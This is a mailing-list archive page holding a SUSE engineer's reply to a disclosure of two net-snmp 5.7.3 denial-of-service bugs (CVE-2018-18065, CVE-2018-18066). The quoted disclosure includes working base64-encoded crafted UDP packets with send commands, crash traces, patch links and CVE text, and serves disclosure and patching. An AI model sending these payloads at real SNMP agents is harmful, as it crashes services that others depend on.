oss-sec mailing list archives
Re: net-snmp 5.7.3 unauthenticated remote Denial of Service (exploit available)
From: Alexander Bergmann <abergmann () suse com>
Date: Tue, 9 Oct 2018 00:31:32 +0200
Hi Magnus, thanks for your report. I can reproduce VULN#2 (CVE-2018-18065) with our net-snmp-5.7.3 version (sle12/sle15). Our net-snmp-5.4.2.1 version seams to be unaffected. Regarding your VULN#1 (CVE-2018-18066) I noticed that the patch was already applied to our code base and CVE-2015-5621 was assigned. The issue was already mentioned here at oss-security. https://www.openwall.com/lists/oss-security/2015/07/31/1 I didn't check the details yet, but if the new CVE is a duplicate, please contact NIST about it. Kind regards, Alex~ On Mon, Oct 08, 2018 at 08:46:29PM +0200, Magnus Klaaborg Stubman wrote:
Reference: https://dumpco.re/blog/net-snmp-5.7.3-remote-dos 2018-10-08 NET-SNMP REMOTE DOS =================== Back in january I did some vulnerability research of net-snmp 5.7.3 and found some bugs. Here they are: VULN#1 CVE-2018-18066 ===================== First bug is remotely exploitable without knowledge of the community string, and leads to Denial of Service: # echo -n "MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBwbwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBAChWQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEHCobetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111 # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln 127.0.0.1:1111 ASAN:SIGSEGV ================================================================= ==41810==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007f261b bp 0x7fff34754550 sp 0x7fff34754220 T0) #0 0x7f261a in snmp_oid_compare /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470:13 #1 0x7f261a in _snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4247 #2 0x7f261a in snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4336 #3 0x7f261a in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5241 #4 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14 #5 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10 #6 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502 #7 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15 #8 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118 #9 0x7f2561efeb44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287 #10 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470 snmp_oid_compare ==41810==ABORTING Same configuration for both bugs: magnus@h4xb0x:~/projects/net-snmp$ cat snmpd.conf rocommunity public default -V systemonly rocommunity public localhost -V systemonly rouser authOnlyUser syslocation "On the Desk" syscontact Me <me () example org> VULN#2 CVE-2018-18065 ===================== Second bug is remotely exploitable only with knowledge of the community string (in this case "public") leading to Denial of Service: # echo -n "MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIuMzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQNMjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111 # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln 127.0.0.1:1111 ASAN:SIGSEGV ================================================================= ==41062==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000410 (pc 0x00000075bc0f bp 0x7ffdda226b10 sp 0x7ffdda2269e0 T0) #0 0x75bc0e in _set_key /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564:9 #1 0x75bc0e in _data_lookup /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:614 #2 0x75bc0e in _container_table_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:749 #3 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15 #4 0x572dc4 in netsnmp_call_next_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:640:12 #5 0x58751c in table_helper_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table.c:713:9 #6 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15 #7 0x572c79 in netsnmp_call_handlers /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:611:14 #8 0x520d86 in handle_var_requests /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:2679:22 #9 0x524dbe in handle_pdu /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3441:18 #10 0x51b976 in netsnmp_handle_request /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3284:14 #11 0x515876 in handle_snmp_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:1990:10 #12 0x7f3558 in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5437:7 #13 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14 #14 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10 #15 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502 #16 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15 #17 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118 #18 0x7fc1acb11b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287 #19 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564 _set_key ==41062==ABORTING PATCHES ======= Update to net-snmp-5.8 or apply the following patches: Vuln#1: sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791 Vuln#2: sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d AFFECTED ======== - 5.7.3 - 5.5.2.1 - 5.6.2.1 More versions may be affected as well. TIMELINE ======== 2015-04-11 Vendor releases patch of bug#1 in version control - no public article or otherwise disclosure 2016-10-06 Vendor releases patch of bug#2 in version control - no public article or otherwise disclosure 2018-01-05 I discovered both bugs 2018-01-08 Vendor notified 2018-01-08 Vendor responds - bugs already fixed in version control repo 2018-10-08 Public disclosure of exploit 2018-10-08 CVE-ID assignment PROOF OF DISCOVERY ================== # cat vuln1 | base64 MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBw bwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBACh WQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEH CobetzgECzE3Mi4zMS4xOS4y # sha256sum vuln1 b2ff63c97c705c25c0043758cbd7b1e00cb5692ba1223712a17461082a047125 vuln1 twitter.com/magnusstubman/status/949520650762358789 # cat vuln2 | base64 MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIu MzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQN MjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y # sha256sum vuln2 b7f0e494b8a91c6fedb7e13b3b8dab68a951b5fdc21dd876ae91eb86924018f2 vuln2 twitter.com/magnusstubman/status/949520565064404994 REFERENCES ========== - sourceforge.net/p/net-snmp/bugs/2820 - sourceforge.net/p/net-snmp/bugs/2819 CVE ASSIGNMENTS ===============[Suggested description] _set_key in agent/helpers/table_container.c in Net-SNMP before 5.8 has a NULL Pointer Exception bug that can be used by an authenticated attacker to remotely cause the instance to crash via a crafted UDP packet, resulting in Denial of Service. ------------------------------------------ [Additional Information] Proof of concept exploit are publicly available at dumpco.re/blog/net-snmp-5.7.3-remote-dos ------------------------------------------ [VulnerabilityType Other] Remote Denial of Service (Null Pointer Exception) ------------------------------------------ [Vendor of Product] net-snmp ------------------------------------------ [Affected Product Code Base] net-snmp - vulnerable: 5.7.3, 5.5.2.1, 5.6.2.1. Fixed in: 5.8 ------------------------------------------ [Affected Component] snmpd ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Denial of Service] true ------------------------------------------ [Attack Vectors] A crafted UDP packet must be sent to the target. ------------------------------------------ [Reference] dumpco.re/blog/net-snmp-5.7.3-remote-dos sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d ------------------------------------------ [Has vendor confirmed or acknowledged the vulnerability?] trueUse CVE-2018-18065.[Suggested description] snmp_oid_compare in snmplib/snmp_api.c in Net-SNMP before 5.8 has a NULL Pointer Exception bug that can be used by an unauthenticated attacker to remotely cause the instance to crash via a crafted UDP packet, resulting in Denial of Service. ------------------------------------------ [Additional Information] Proof of concept exploit are publicly available at dumpco.re/blog/net-snmp-5.7.3-remote-dos ------------------------------------------ [VulnerabilityType Other] Remote Denial of Service (NULL Pointer Exception) ------------------------------------------ [Vendor of Product] net-snmp ------------------------------------------ [Affected Product Code Base] net-snmp - vulnerable: 5.7.3, 5.5.2.1, 5.6.2.1. Fixed in: 5.8 ------------------------------------------ [Affected Component] snmpd ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Denial of Service] true ------------------------------------------ [Attack Vectors] A crafted UDP packet must be sent to the target. ------------------------------------------ [Reference] dumpco.re/blog/net-snmp-5.7.3-remote-dos sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791 sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d ------------------------------------------ [Has vendor confirmed or acknowledged the vulnerability?] trueUse CVE-2018-18066. -- CVE Assignment Team M/S M300, 202 Burlington Road, Bedford, MA 01730 USA [ A PGP key is available for encrypted communications at cve.mitre.org/cve/request_id.html ]
-- Alexander Bergmann <abergmann () suse com>, Security Engineer, GPG:9FFA4886 SUSE Linux GmbH, GF: Felix Imendörffer, Jane Smithard, Graham Norton HRB 21284 (AG Nürnberg)
Attachment:
signature.asc
Description: Digital signature
Current thread:
- net-snmp 5.7.3 unauthenticated remote Denial of Service (exploit available) Magnus Klaaborg Stubman (Oct 08)
- Re: net-snmp 5.7.3 unauthenticated remote Denial of Service (exploit available) Alexander Bergmann (Oct 08)
- Re: net-snmp 5.7.3 unauthenticated remote Denial of Service (exploit available) Salvatore Bonaccorso (Oct 09)
- Re: net-snmp 5.7.3 unauthenticated remote Denial of Service (exploit available) Magnus Klaaborg Stubman (Oct 10)
- Re: net-snmp 5.7.3 unauthenticated remote Denial of Service (exploit available) Salvatore Bonaccorso (Oct 09)
- Re: net-snmp 5.7.3 unauthenticated remote Denial of Service (exploit available) Alexander Bergmann (Oct 08)